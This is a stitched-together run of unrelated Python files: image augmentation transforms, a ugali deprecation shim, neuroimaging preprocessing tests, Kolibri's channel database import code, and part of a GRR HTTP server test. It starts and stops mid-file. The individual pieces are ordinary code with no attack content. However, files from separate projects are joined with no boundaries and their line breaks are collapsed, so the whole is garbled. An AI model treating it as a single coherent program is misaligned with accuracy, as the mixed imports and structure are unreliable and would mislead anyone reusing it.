scale_range def __call__(self, data): rand_factor = np.random.normal(1, 0.75) scale = np.min((self.scale_range[1], rand_factor)) scale = np.max((self.scale_range[0], scale)) data = [ cv2.resize(d, None, fx=scale, fy=scale, interpolation=cv2.INTER_LINEAR if d.dtype == np.float32 else cv2.INTER_NEAREST) for d in data] return data class RandomCrop: def __init__(self, crop_size=(200, 200)): self.crop_size = crop_size def __call__(self, data): height, width = data[0].shape[:2] c_h, c_w = self.crop_size assert height >= c_h and width >= c_w, f"({height}, {width}) v.s. ({c_h}, {c_w})" left = random.randint(0, width - c_w) top = random.randint(0, height - c_h) data = [d[top:top+c_h, left:left+c_w] for d in data] return data #!/usr/bin/env python #This is only for backwards compatibility msg = "'import ugali.analysis.isochrone' is deprecated. " msg += "Use 'import ugali.isochrone' instead." DeprecationWarning(msg) from ugali.isochrone import * import numpy as np import nose.tools as nt import numpy.testing as npt import nibabel as nib from .. import preproc def test_prep_timeseries(): prepper = preproc.PrepTimeseries(frames_to_toss=5) data = np.random.randn(60, 60, 33, 100) out_data = prepper.trim_timeseries(data) nt.assert_equal(out_data.shape, (60, 60, 33, 95)) prepper = preproc.PrepTimeseries(frames_to_toss=0) data = np.random.randn(60, 60, 33, 100) out_data = prepper.trim_timeseries(data) nt.assert_equal(out_data.shape, (60, 60, 33, 100)) def test_extract_realignment_target(): extractor = preproc.ExtractRealignmentTarget() for ntp in [20, 21]: index = np.arange(ntp)[None, None, None, :] data = np.ones((45, 45, 30, ntp)) * index img = nib.Nifti1Image(data, np.eye(4)) targ = extractor.extract_target(img) nt.assert_equal(np.asscalar(np.unique(targ)), ntp // 2) def test_robust_normalization(): rs = np.random.RandomState(99) vol_shape = [40, 40, 30] ntp = 100 ts = rs.normal(0, 1, size=vol_shape + [ntp]) mask = rs.uniform(size=vol_shape) > .4 art = preproc.ArtifactDetection() out = art.normalize_timeseries(ts, mask) nt.assert_equal(out.shape, (ntp,)) def test_scale_timeseries(): rs = np.random.RandomState(99) data = rs.randn(10, 10, 10, 20) mask = rs.rand(10, 10, 10) > .25 scaler = preproc.ScaleTimeseries() for target in [20, 40]: for func in [np.mean, np.median]: out = scaler.scale_timeseries(func, data, mask, target) npt.assert_almost_equal(func(out[mask]), target) <reponame>lyw07/kolibri import logging from django.apps import apps from django.db.models.fields.related import ForeignKey from sqlalchemy.exc import OperationalError from sqlalchemy.exc import SQLAlchemyError from sqlalchemy.sql import text from .annotation import update_content_metadata from .channels import read_channel_metadata_from_db_file from .paths import get_content_database_file_path from .sqlalchemybridge import Bridge from .sqlalchemybridge import ClassNotFoundError from kolibri.core.content.apps import KolibriContentConfig from kolibri.core.content.legacy_models import License from kolibri.core.content.models import ChannelMetadata from kolibri.core.content.models import CONTENT_SCHEMA_VERSION from kolibri.core.content.models import ContentNode from kolibri.core.content.models import ContentTag from kolibri.core.content.models import File from kolibri.core.content.models import Language from kolibri.core.content.models import LocalFile from kolibri.core.content.models import NO_VERSION from kolibri.core.content.models import V020BETA1 from kolibri.core.content.models import V040BETA3 from kolibri.core.content.models import 
VERSION_1 from kolibri.core.content.models import VERSION_2 from kolibri.utils.time_utils import local_now logger = logging.getLogger(__name__) CONTENT_APP_NAME = KolibriContentConfig.label merge_models = [ContentTag, LocalFile, Language] models_not_to_overwrite = [LocalFile] models_to_exclude = [ apps.get_model(CONTENT_APP_NAME, "ChannelMetadata_included_languages") ] class ImportCancelError(Exception): pass def column_not_auto_integer_pk(column): """ A check for whether a column is an auto incrementing integer used for a primary key. """ return not ( column.autoincrement == "auto" and column.primary_key and column.type.python_type is int ) def convert_to_sqlite_value(python_value): if isinstance(python_value, bool): return "1" if python_value else "0" elif python_value is None: return "null" else: return repr(python_value) class ChannelImport(object): """ The ChannelImport class has two functions: 1) it acts as the default import pattern for importing content databases that have naively compatible version with the current version of Kolibri (i.e. no explicit mappings are required to bring data from the content db into the main db, as there is a one to one correspondence in table names and column names within tables). 2) It is also the base class for any more complex import that requires explicit schema mappings from one version to another. """ current_model_being_imported = None _sqlite_db_attached = False # Specific instructions and exceptions for importing table from previous versions of Kolibri # Mappings can be: # 1) 'per_row', specifying mappings for an entire row, string can either be an attribute # or a method name on the import class # 2) 'per_table' mapping an entire table at a time. Only a method name can be used for 'per_table' mappings. # # Both can be used simultaneously. # # See NoVersionChannelImport for an annotated example. schema_mapping = { ContentNode: { "per_row": { "tree_id": "available_tree_id", "available": "default_to_not_available", } }, LocalFile: {"per_row": {"available": "default_to_not_available"}}, File: {"per_row": {"available": "default_to_not_available"}}, } def __init__(self, channel_id, channel_version=None, cancel_check=None): self.channel_id = channel_id self.channel_version = channel_version self.cancel_check = cancel_check self.source_db_path = get_content_database_file_path(self.channel_id) self.source = Bridge(sqlite_file_path=self.source_db_path) # Explicitly set the destination schema version to our latest published schema version # Not the current schema of the DB, as we do our mapping to the published versions. 
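# convert_to_sqlite_value (defined above) renders Python values as SQL literals for the
# raw attached-database transfer used further below; a quick illustration of its output,
# assuming only the function as written:
assert convert_to_sqlite_value(True) == "1"
assert convert_to_sqlite_value(False) == "0"
assert convert_to_sqlite_value(None) == "null"
assert convert_to_sqlite_value(42) == "42"        # repr(42)
assert convert_to_sqlite_value("abc") == "'abc'"  # repr keeps the quotes for strings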
self.destination = Bridge( schema_version=CONTENT_SCHEMA_VERSION, app_name=CONTENT_APP_NAME ) content_app = apps.get_app_config(CONTENT_APP_NAME) # Use this rather than get_models, as it returns a list of all models, including those # generated by ManyToMany fields, whereas get_models only returns explicitly defined # Model classes self.content_models = list(content_app.get_models(include_auto_created=True)) for blacklisted_model in models_to_exclude: if blacklisted_model in self.content_models: self.content_models.remove(blacklisted_model) # Get the next available tree_id in our database self.available_tree_id = self.find_unique_tree_id() self.default_to_not_available = 0 def get_none(self, source_object): return None def get_all_destination_tree_ids(self): ContentNodeRecord = self.destination.get_class(ContentNode) return sorted( map( lambda x: x[0], self.destination.session.query(ContentNodeRecord.tree_id) .distinct() .all(), ) ) def find_unique_tree_id(self): tree_ids = self.get_all_destination_tree_ids() # If there are no pre-existing tree_ids just escape here and return 1 if not tree_ids: return 1 if len(tree_ids) == 1: if tree_ids[0] == 1: return 2 return 1 # Do a binary search to find the lowest unused tree_id def find_hole_in_list(ids): last = len(ids) - 1 middle = int(last / 2 + 1) # Check if the lower half of ids has a hole in it if ids[middle] - ids[0] != middle: # List is only two ids, so hole must be between them if middle == 1: return ids[0] + 1 return find_hole_in_list(ids[:middle]) # Otherwise check if there is a hole in the second half if ids[last] - ids[middle] != last - middle: # Second half is only two ids so hole must be between them if last - middle == 1: return ids[middle] + 1 return find_hole_in_list(ids[middle:]) # We should only reach this point in the first iteration, if there are no holes in either # the first or the last half of the list, therefore, we just take the max of the list plus 1 # Because the list is already sorted, we can just take the last value return ids[-1] + 1 return find_hole_in_list(tree_ids) def generate_row_mapper(self, mappings=None): # If no mappings, just use an empty object if mappings is None: # If no mappings have been specified, we can just skip direct to # the default return value without doing any other checks return self.base_row_mapper def mapper(record, column): """ A mapper function for the mappings object """ if column in mappings: # If the column name is in our defined mappings object, # then we need to try to find an alternate value col_map = mappings.get(column) # Get the string value for the mapping if hasattr(record, col_map): # Is this mapping value another column of the table? 
# If so, return it straight away return getattr(record, col_map) elif hasattr(self, col_map): # Otherwise, check to see if the import class has an attribute with this name # We assume that if it is, then it is either a literal value or a callable method # that accepts the row data as its only argument, and if so, return the result of # calling that method on the row data mapping = getattr(self, col_map) if callable(mapping): return mapping(record) else: return mapping else: # If neither of these true, we specified a column mapping that is invalid raise AttributeError( "Column mapping specified but no valid column name or method found" ) else: # Otherwise, we can just get the value directly from the record return self.base_row_mapper(record, column) # Return the mapper function for repeated use return mapper def base_table_mapper(self, SourceRecord): # If SourceRecord is none, then the source table does not exist in the DB if SourceRecord: return self.source.session.query(SourceRecord).all() return [] def base_row_mapper(self, record, column): # By default just return value directly from the record return getattr(record, column, None) def generate_table_mapper(self, table_map=None): if table_map is None: # If no table mapping specified, just use the default return self.base_table_mapper # Can only be a method on the Import object if hasattr(self, table_map): # If it is a method of the import class return that method for later use return getattr(self, table_map) # If we got here, there is an invalid table mapping raise AttributeError("Table mapping specified but no valid method found") def raw_attached_sqlite_table_import( self, model, row_mapper, table_mapper, unflushed_rows ): self.check_cancelled() source_table = self.source.get_table(model) dest_table = self.destination.get_table(model) # check the schema map and set up any fields to map to constant values field_constants = {} schema_map = self.schema_mapping.get(model) if schema_map: for field, mapper in schema_map.get("per_row", {}).items(): if hasattr(self, mapper): mapattr = getattr(self, mapper) if callable(mapattr): raise Exception( "Can't use SQLITE table import method with callable column mappers" ) else: field_constants[field] = mapattr else: raise Exception( "Can't use SQLITE table import method with mapping attribute '{}'".format( mapper ) ) # make sure to ignore any auto-incrementing fields so they're regenerated in the destination table fields_to_ignore = set( [ colname for colname, colobj in dest_table.columns.items() if not column_not_auto_integer_pk(colobj) ] ) # enumerate the columns we're going to be writing into, excluding any we're meant to ignore dest_columns = [ col.name for col in dest_table.c if col.name not in fields_to_ignore ] # build a list of values (constants or source table column references) to be inserted source_vals = [] for col in dest_columns: if col in field_constants: # insert the literal constant value, if we have one val = convert_to_sqlite_value(field_constants[col]) elif col in source_table.columns.keys(): # pull the value from the column on the source table if it exists val = "source." 
+ col else: # get the default value from the target model and use that, if the source table didn't have the field val = convert_to_sqlite_value(model._meta.get_field(col).get_default()) source_vals.append(val) if model in models_not_to_overwrite: method = "INSERT OR IGNORE" else: method = "REPLACE" # build and execute a raw SQL query to transfer the data in one fell swoop query = """{method} INTO {table} ({destcols}) SELECT {sourcevals} FROM sourcedb.{table} AS source""".format( method=method, table=dest_table.name, destcols=", ".join(dest_columns), sourcevals=", ".join(source_vals), ) self.destination.session.execute(text(query)) # no need to flush/commit as a result of the transfer in this method return 1 def orm_table_import(self, model, row_mapper, table_mapper, unflushed_rows): DestinationRecord = self.destination.get_class(model) dest_table = self.destination.get_table(model) # If the source class does not exist (i.e. this table is undefined in the source database) # this will raise an error so we set it to None. In this case, a custom table mapper must # have been set up to handle the fact that this is None. try: SourceRecord = self.source.get_class(model) except ClassNotFoundError: SourceRecord = None # Filter out columns that are auto-incrementing integer primary keys, as these can cause collisions in the # database. As all of our content database models use UUID primary keys, the only tables using these # primary keys are intermediary tables for ManyToMany fields, and so nothing should be Foreign Keying # to these ids. # By filtering them here, the database should autoset an incremented id. columns = [ column_name for column_name, column_obj in dest_table.columns.items() if column_not_auto_integer_pk(column_obj) ] data_to_insert = [] merge = model in merge_models do_not_overwrite = model in models_not_to_overwrite for record in table_mapper(SourceRecord): self.check_cancelled() data = { str(column): row_mapper(record, column) for column in columns if row_mapper(record, column) is not None } if merge: self.merge_record( data, model, DestinationRecord, do_not_overwrite=do_not_overwrite ) else: data_to_insert.append(data) unflushed_rows += 1 if unflushed_rows == 10000: if not merge: self.destination.session.bulk_insert_mappings( DestinationRecord, data_to_insert ) data_to_insert = [] self.destination.session.flush() unflushed_rows = 0 if not merge and data_to_insert: self.destination.session.bulk_insert_mappings( DestinationRecord, data_to_insert ) return unflushed_rows def can_use_sqlite_attach_method(self, model, row_mapper, table_mapper): # Check whether we can directly "attach" the sqlite database and do a one-line transfer # First check that we are not doing any mapping to construct the tables can_use_attach = table_mapper == self.base_table_mapper # Now check that the schema mapping doesn't contain anything that we don't know how to handle schema_map = self.schema_mapping.get(model) if schema_map: # Check that the only thing in the schema map is row mappings can_use_attach = ( can_use_attach and len(set(schema_map.keys()) - set(["per_row"])) == 0 ) # Check that all the row mappings defined for this table are things we can handle for row_mapping in set(schema_map.get("per_row", {}).values()): if hasattr(self, row_mapping): if callable(getattr(self, row_mapping)): return False else: return False # Check that the engine being used is sqlite, and it's been attached can_use_attach = can_use_attach and self._sqlite_db_attached # Check that the table is in the source database 
(otherwise we can't use the ATTACH method) try: self.source.get_class(model) except ClassNotFoundError: return False return can_use_attach def table_import(self, model, row_mapper, table_mapper, unflushed_rows): # keep track of which model is currently being imported self.current_model_being_imported = model if self.can_use_sqlite_attach_method(model, row_mapper, table_mapper): result = self.raw_attached_sqlite_table_import( model, row_mapper, table_mapper, unflushed_rows ) else: result = self.orm_table_import( model, row_mapper, table_mapper, unflushed_rows ) self.current_model_being_imported = None return result def merge_record(self, data, model, DestinationRecord, do_not_overwrite=False): # Models that should be merged (see list above) need to be individually merged into the session # as SQL Alchemy ORM does not support INSERT ... ON DUPLICATE KEY UPDATE style queries, # as not available in SQLite, only MySQL as far as I can tell: # http://hackthology.com/how-to-compile-mysqls-on-duplicate-key-update-in-sql-alchemy.html RowEntry = self.destination.session.query(DestinationRecord).get( data[model._meta.pk.name] ) if RowEntry: # record already exists, so if we don't want to overwrite, abort here if do_not_overwrite: return for key, value in data.items(): setattr(RowEntry, key, value) else: RowEntry = DestinationRecord(**data) self.destination.session.merge(RowEntry) def check_and_delete_existing_channel(self): try: existing_channel = ChannelMetadata.objects.get(id=self.channel_id) except ChannelMetadata.DoesNotExist: existing_channel = None if existing_channel: if existing_channel.version < self.channel_version: # We have an older version of this channel, so let's clean out the old stuff first logger.info( ( "Older version {channel_version} of channel {channel_id} already exists in database; removing old entries " + "so we can upgrade to version {new_channel_version}" ).format( channel_version=existing_channel.version, channel_id=self.channel_id, new_channel_version=self.channel_version, ) ) self.delete_old_channel_data(existing_channel.root.tree_id) else: # We have previously loaded this channel, with the same or newer version, so our work here is done logger.warn( ( "Version {channel_version} of channel {channel_id} already exists in database; cancelling import of " + "version {new_channel_version}" ).format( channel_version=existing_channel.version, channel_id=self.channel_id, new_channel_version=self.channel_version, ) ) return False return True def _can_use_optimized_pre_deletion(self, model): # check whether we can skip fully deleting this model, if we'll be using REPLACE on it anyway mapping = self.schema_mapping.get(model, {}) row_mapper = self.generate_row_mapper(mapping.get("per_row")) table_mapper = self.generate_table_mapper(mapping.get("per_table")) return self.can_use_sqlite_attach_method(model, row_mapper, table_mapper) def delete_old_channel_data(self, old_tree_id): # construct a template for deleting records for models that foreign key onto ContentNode delete_related_template = """ DELETE FROM {table} WHERE {fk_field} IN ( SELECT id FROM {cn_table} WHERE tree_id = '{tree_id}' ) """ # construct a template for deleting the ContentNode records themselves delete_contentnode_template = "DELETE FROM {table} WHERE tree_id = '{tree_id}'" # we want to delete all content models, but not "merge models" (ones that might also be used by other channels), and ContentNode last models_to_delete = [ model for model in self.content_models if model is not ContentNode and model not in 
merge_models ] + [ContentNode] for model in models_to_delete: # we do a few things differently if it's the ContentNode model, vs a model related to ContentNode if model is ContentNode: template = delete_contentnode_template fields = ["id"] else: template = delete_related_template fields = [ f.column for f in model._meta.fields if isinstance(f, ForeignKey) and f.target_field.model is ContentNode ] # if the external database is attached and there are no incompatible schema mappings for a table, # we can skip deleting records that will be REPLACED during import, which helps efficiency if self._can_use_optimized_pre_deletion(model): template += " AND NOT id IN (SELECT id FROM sourcedb.{table})" # run a query for each field this model has that foreignkeys onto ContentNode for field in fields: # construct the actual query by filling in variables query = template.format( table=model._meta.db_table, fk_field=field, tree_id=old_tree_id, cn_table=ContentNode._meta.db_table, ) # check that the import operation hasn't since been cancelled self.check_cancelled() # execute the actual query self.destination.session.execute(text(query)) def check_cancelled(self): if callable(self.cancel_check): check = self.cancel_check() else: check = bool(self.cancel_check) if check: raise ImportCancelError("Channel import was cancelled") def try_attaching_sqlite_database(self): # attach the external content database to our primary database so we can directly transfer records en masse if self.destination.engine.name == "sqlite": try: self.destination.session.execute( text( "ATTACH '{path}' AS 'sourcedb'".format(path=self.source_db_path) ) ) self._sqlite_db_attached = True except OperationalError: # silently ignore if we were unable to attach the database; we'll just fall back to other methods pass def try_detaching_sqlite_database(self): # detach the content database from the primary database so we don't get errors trying to attach it again later if self.destination.engine.name == "sqlite": try: self.destination.session.execute( text("DETACH 'sourcedb'".format(path=self.source_db_path)) ) except OperationalError: # silently ignore if the database was already detached, as then we're good to go pass self._sqlite_db_attached = False def import_channel_data(self): unflushed_rows = 0 try: self.try_attaching_sqlite_database() if self.check_and_delete_existing_channel(): for model in self.content_models: mapping = self.schema_mapping.get(model, {}) row_mapper = self.generate_row_mapper(mapping.get("per_row")) table_mapper = self.generate_table_mapper(mapping.get("per_table")) logger.info("Importing {model} data".format(model=model.__name__)) unflushed_rows = self.table_import( model, row_mapper, table_mapper, unflushed_rows ) self.destination.session.commit() self.try_detaching_sqlite_database() except (SQLAlchemyError, ImportCancelError) as e: # Rollback the transaction if any error occurs during the transaction self.destination.session.rollback() self.try_detaching_sqlite_database() # Reraise the exception to prevent other errors occuring due to the non-completion raise e def end(self): self.source.end() self.destination.end() class NoVersionChannelImport(ChannelImport): """ Class defining the schema mapping for importing old content databases (i.e. ones produced before the ChannelImport machinery was implemented). The schema mapping below defines how to bring in information from the old version of the Kolibri content databases into the database for the current version of Kolibri. 
""" schema_mapping = { # The top level keys of the schema_mapping are the Content Django Models that are to be imported ContentNode: { # For each model's mappings, can defined both 'per_row' and 'per_table' mappings. "per_row": { # The key of the 'per_row' mapping object is the table column that we are populating # In the case of Django ForeignKey fields, this will be the field name plus _id # The value is a string that refers either to a table column on the source data # or a method on this import class that will be passed the row data and should return # the mapped value. "channel_id": "infer_channel_id_from_source", "tree_id": "available_tree_id", "available": "get_none", "license_name": "get_license_name", "license_description": "get_license_description", } }, File: { "per_row": { # If we didn't want to encode the Django _id convention here, we could reference the field # attname in order to set it. File._meta.get_field("local_file").attname: "checksum", "available": "get_none", } }, LocalFile: { # Because LocalFile does not exist on old content databases, we have to override the table that # we are drawing from, the generate_local_file_from_file method overrides the default mapping behaviour # and instead reads from the File model table # It then uses per_row mappers to get the require model fields from the File model to populate our # new LocalFiles. "per_table": "generate_local_file_from_file", "per_row": { "id": "checksum", "extension": "extension", "file_size": "file_size", "available": "get_none", }, }, ChannelMetadata: { "per_row": { ChannelMetadata._meta.get_field( "min_schema_version" ).attname: "set_version_to_no_version", "root_id": "root_pk", } }, } licenses = {} def infer_channel_id_from_source(self, source_object): return self.channel_id def generate_local_file_from_file(self, SourceRecord): SourceRecord = self.source.get_class(File) checksum_record = set() # LocalFile objects are unique per checksum for record in self.source.session.query(SourceRecord).all(): if record.checksum not in checksum_record: checksum_record.add(record.checksum) yield record else: continue def set_version_to_no_version(self, source_object): return NO_VERSION def get_license(self, SourceRecord): license_id = SourceRecord.license_id if not license_id: return None if license_id not in self.licenses: LicenseRecord = self.source.get_class(License) license = self.source.session.query(LicenseRecord).get(license_id) self.licenses[license_id] = license return self.licenses[license_id] def get_license_name(self, SourceRecord): license = self.get_license(SourceRecord) if not license: return None return license.license_name def get_license_description(self, SourceRecord): license = self.get_license(SourceRecord) if not license: return None return license.license_description # Dict that maps from schema versions to ChannelImport classes # The channel import class defines all the operations required in order to import data # from a content database with this content schema, into the schema being used by this # version of Kolibri. 
When a new schema version is added mappings = { V020BETA1: NoVersionChannelImport, V040BETA3: NoVersionChannelImport, NO_VERSION: NoVersionChannelImport, VERSION_1: ChannelImport, VERSION_2: ChannelImport, } class FutureSchemaError(Exception): pass class InvalidSchemaVersionError(Exception): pass def initialize_import_manager(channel_id, cancel_check=None): channel_metadata = read_channel_metadata_from_db_file( get_content_database_file_path(channel_id) ) # For old versions of content databases, we can only infer the schema version min_version = getattr( channel_metadata, "min_schema_version", getattr(channel_metadata, "inferred_schema_version"), ) try: ImportClass = mappings.get(min_version) except KeyError: try: version_number = int(min_version) if version_number > int(CONTENT_SCHEMA_VERSION): raise FutureSchemaError( "Tried to import schema version, {version}, which is not supported by this version of Kolibri.".format( version=min_version ) ) elif version_number < int(CONTENT_SCHEMA_VERSION): # If it's a valid integer, but there is no schema for it, then we have stopped supporting this version raise InvalidSchemaVersionError( "Tried to import unsupported schema version {version}".format( version=min_version ) ) except ValueError: raise InvalidSchemaVersionError( "Tried to import invalid schema version {version}".format( version=min_version ) ) return ImportClass( channel_id, channel_version=channel_metadata.version, cancel_check=cancel_check ) def import_channel_from_local_db(channel_id, cancel_check=None): import_manager = initialize_import_manager(channel_id, cancel_check=cancel_check) import_manager.import_channel_data() import_manager.end() update_content_metadata(channel_id) channel = ChannelMetadata.objects.get(id=channel_id) channel.last_updated = local_now() try: assert channel.root except ContentNode.DoesNotExist: node_id = channel.root_id ContentNode.objects.create( id=node_id, title=channel.name, content_id=node_id, channel_id=channel_id ) channel.save() #!/usr/bin/env python """Unittest for grr http server.""" import hashlib import os import socket import threading import ipaddr import portpicker import requests from google.protobuf import json_format from grr.lib import flags from grr.lib import utils from grr.lib.rdfvalues import file_finder as rdf_file_finder from grr.lib.rdfvalues import paths as rdf_paths from grr.lib.rdfvalues import rekall_types as rdf_rekall_types from grr.server.grr_response_server import aff4 from grr.server.grr_response_server import flow from grr.server.grr_response_server import frontend_lib from grr.server.grr_response_server.aff4_objects import aff4_grr from grr.server.grr_response_server.aff4_objects import filestore from grr.server.grr_response_server.bin import frontend from grr.server.grr_response_server.flows.general import file_finder from grr.test_lib import action_mocks from grr.test_lib import flow_test_lib from grr.test_lib import rekall_test_lib from grr.test_lib import test_lib from grr.test_lib import worker_mocks class GRRHTTPServerTest(test_lib.GRRBaseTest): """Test the http server.""" @classmethod def setUpClass(cls): super(GRRHTTPServerTest, cls).setUpClass() cls.config_overrider = test_lib.ConfigOverrider({ "Rekall.profile_server": rekall_test_lib.TestRekallRepositoryProfileServer.__name__, "FileUploadFileStore.root_dir": test_lib.TempDirPath() }) cls.config_overrider.Start() # Frontend must be initialized to register all the stats counters. frontend_lib.FrontendInit().RunOnce() # Bring up a local server for testing. 
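# The same bring-up pattern using only the standard library (a hypothetical Python 3
# sketch, not the GRR frontend used below): bind to port 0 so the OS picks a free port,
# then serve from a daemon thread so the class teardown can stop it cleanly.
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

class _PingHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"ok")

def _start_test_server():
    httpd = HTTPServer(("127.0.0.1", 0), _PingHandler)  # port 0 = any unused port
    thread = threading.Thread(target=httpd.serve_forever)
    thread.daemon = True
    thread.start()
    base_url = "http://127.0.0.1:%d/" % httpd.server_address[1]
    return httpd, thread, base_url
# Later: httpd.shutdown(), mirroring tearDownClass below.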
port = portpicker.PickUnusedPort() ip = utils.ResolveHostnameToIP("localhost", port) cls.httpd = frontend.GRRHTTPServer((ip, port), frontend.GRRHTTPServerHandler) if ipaddr.IPAddress(ip).version == 6: cls.address_family = socket.AF_INET6 cls.base_url = "http://[%s]:%d/" % (ip, port) else: cls.address_family = socket.AF_INET cls.base_url = "http://%s:%d/" % (ip, port) cls.httpd_thread = threading.Thread(target=cls.httpd.serve_forever) cls.httpd_thread.daemon = True cls.httpd_thread.start() @classmethod def tearDownClass(cls): cls.httpd.shutdown() cls.config_overrider.Stop() def setUp(self): super(GRRHTTPServerTest, self).setUp() self.client_id = self.SetupClient(0) def testServerPem(self): req = requests.get(self.base_url + "server.pem") self.assertEqual(req.status_code, 200) self.assertTrue("BEGIN CERTIFICATE" in req.content) def _RunClientFileFinder(self, paths, action, network_bytes_limit=None, client_id=None): client_id = client_id or self.SetupClient(0) with test_lib.ConfigOverrider({"Client.server_urls": [self.base_url]}): session_id = flow_test_lib.TestFlowHelper( file_finder.ClientFileFinder.__name__, action_mocks.ClientFileFinderClientMock( client_worker=worker_mocks.FakeClientWorker()), client_id=client_id, paths=paths, pathtype=rdf_paths.PathSpec.PathType.OS, action=action, process_non_regular_files=True, network_bytes_limit=network_bytes_limit, token=self.token) return session_id def testClientFileFinderUpload(self): paths = [os.path.join(self.base_path, "{**,.}/*.plist")] action = rdf_file_finder.FileFinderAction.Download() session_id = self._RunClientFileFinder(paths, action) collection = flow.GRRFlow.ResultCollectionForFID(session_id) results = list(collection) self.assertEqual(len(results), 4) relpaths = [ os.path.relpath(p.stat_entry.pathspec.path, self.base_path) for p in results ] self.assertItemsEqual(relpaths, [ "History.plist", "History.xml.plist", "test.plist", "parser_test/com.google.code.grr.plist" ]) for r in results: aff4_obj = aff4.FACTORY.Open( r.stat_entry.pathspec.AFF4Path(self.client_id), token=self.token) data = open(r.stat_entry.pathspec.path, "rb").read() self.assertEqual(aff4_obj.Read(100), data[:100]) hash_obj = aff4_obj.Get(aff4_obj.Schema.HASH) self.assertEqual(hash_obj.md5, hashlib.md5(data).hexdigest()) self.assertEqual(hash_obj.sha1, hashlib.sha1(data).hexdigest()) self.assertEqual(hash_obj.sha256, hashlib.sha256(data).hexdigest()) def testClientFileFinderUploadLimit(self): paths = [os.path.join(self.base_path, "{**,.}/*.plist")] action = rdf_file_finder.FileFinderAction.Download() # TODO(hanuszczak): Instead of catching arbitrary runtime errors, we should # catch specific instance that was thrown. Unfortunately, all errors are # intercepted in the `MockWorker` class and converted to runtime errors. 
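# A small unittest sketch (hypothetical names) of the message-matching fallback the TODO
# above describes: once a wrapper re-raises everything as RuntimeError, the only way to
# pin down the failure is by matching its message.
import unittest

class _LimitMessageExample(unittest.TestCase):
    def test_message_match(self):
        # The concrete exception type is gone, so assert on the text instead.
        with self.assertRaisesRegex(RuntimeError, "network send limit"):
            raise RuntimeError("exceeded network send limit")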
with self.assertRaisesRegexp(RuntimeError, "exceeded network send limit"): self._RunClientFileFinder(paths, action, network_bytes_limit=1500) def testClientFileFinderUploadBound(self): paths = [os.path.join(self.base_path, "{**,.}/*.plist")] action = rdf_file_finder.FileFinderAction.Download( oversized_file_policy="DOWNLOAD_TRUNCATED", max_size=300) session_id = self._RunClientFileFinder(paths, action) collection = flow.GRRFlow.ResultCollectionForFID(session_id) results = list(collection) self.assertEqual(len(results), 4) relpaths = [ os.path.relpath(p.stat_entry.pathspec.path, self.base_path) for p in results ] self.assertItemsEqual(relpaths, [ "History.plist", "History.xml.plist", "test.plist", "parser_test/com.google.code.grr.plist" ]) for r in results: aff4_obj = aff4.FACTORY.Open( r.stat_entry.pathspec.AFF4Path(self.client_id), token=self.token) data = aff4_obj.read() self.assertLessEqual(len(data), 300) self.assertEqual(data, open(r.stat_entry.pathspec.path, "rb").read(len(data))) def testClientFileFinderUploadSkip(self): paths = [os.path.join(self.base_path, "{**,.}/*.plist")] action = rdf_file_finder.FileFinderAction.Download( oversized_file_policy="SKIP", max_size=300) session_id = self._RunClientFileFinder(paths, action) collection = flow.GRRFlow.ResultCollectionForFID(session_id) results = list(collection) skipped = [] uploaded = [] for result in results: if result.HasField("transferred_file"): uploaded.append(result) else: skipped.append(result) self.assertEqual(len(uploaded), 2) self.assertEqual(len(skipped), 2) relpaths = [ os.path.relpath(p.stat_entry.pathspec.path, self.base_path) for p in uploaded ] self.assertItemsEqual(relpaths, ["History.plist", "test.plist"]) for r in uploaded: aff4_obj = aff4.FACTORY.Open( r.stat_entry.pathspec.AFF4Path(self.client_id), token=self.token) self.assertEqual( aff4_obj.Read(100), open(r.stat_entry.pathspec.path, "rb").read(100)) def testClientFileFinderFilestoreIntegration(self): paths = [os.path.join(self.base_path, "{**,.}/*.plist")] action = rdf_file_finder.FileFinderAction.Download() client_ids = self.SetupClients(2) session_ids = { c: self._RunClientFileFinder(paths, action, client_id=c) for c in client_ids } collections = { c: flow.GRRFlow.ResultCollectionForFID(session_id) for c, session_id in session_ids.iteritems() } for client_id, collection in collections.iteritems(): results = list(collection) self.assertEqual(len(results), 4) relpaths = [ os.path.relpath(p.stat_entry.pathspec.path, self.base_path) for p in results ] self.assertItemsEqual(relpaths, [ "History.plist", "History.xml.plist", "test.plist", "parser_test/com.google.code.grr.plist" ]) for r in results: aff4_obj = aff4.FACTORY.Open( r.stat_entry.pathspec.AFF4Path(client_id), token=self.token) # When files are uploaded to the server they are stored as VFSBlobImage. self.assertIsInstance(aff4_obj, aff4_grr.VFSBlobImage) # There is a STAT entry. self.assertTrue(aff4_obj.Get(aff4_obj.Schema.STAT)) # Make sure the HashFileStore has references to this file for # all hashes. hashes = aff4_obj.Get(aff4_obj.Schema.HASH) fs = filestore.HashFileStore md5_refs = list(fs.GetReferencesMD5(hashes.md5, token=self.token)) self.assertIn(aff4_obj.urn, md5_refs) sha1_refs = list(fs.GetReferencesSHA1(hashes.sha1, token=self.token)) self.assertIn(aff4_obj.urn, sha1_refs) sha256_refs = list( fs.GetReferencesSHA256(hashes.sha256, token=self.token)) self.assertIn(aff4_obj.urn, sha256_refs) # Open the file inside the file store. 
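# The digests that the hash assertions above compare against come straight from hashlib;
# a self-contained reminder of that computation (illustration only, independent of AFF4):
import hashlib

def _digests(data):
    # The same three digests the Schema.HASH checks rely on.
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }

# _digests(b"")["md5"] == "d41d8cd98f00b204e9800998ecf8427e"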
